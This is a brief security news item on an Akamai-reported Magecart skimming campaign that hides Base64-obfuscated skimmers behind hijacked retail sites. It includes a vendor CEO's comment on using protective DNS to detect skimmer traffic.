A new Magecart credit card stealing campaign has been highlighted by Akamai. This new campaign hijacks retail sites to act as temporary C2 servers to inject and hide the skimmers on targeted eCommerce sites in the US, the UK, Australia, Brazil, Peru, and Estonia. Many of the victims did not realize they were breached for over a month as the threat actors had obfuscated the skimmer with Base64 encoding, hiding the host’s URL so it resembles that of Google Tag Manager or Facebook Pixel.
David Ratner, CEO at HYAS, shares these insights:
“Protective DNS solutions are known for observing and stopping anomalous communications or connections coming out of an organization to known nefarious infrastructure; however, consumers accessing websites behave in much the same way, as the traversal of the website generates a series of connections to other domains and, in the case of Magecart infections, some being to nefarious locations. Protective DNS solutions can also be utilized by organizations to periodically scan their consumer-facing websites to identify these anomalous communications and address Magecart and other vulnerabilities, before significant numbers of consumers are taken advantage of.”
This is one of these areas where both consumers and organizations need to take steps to protect each other. By doing so, it makes these sorts of campaigns less effective.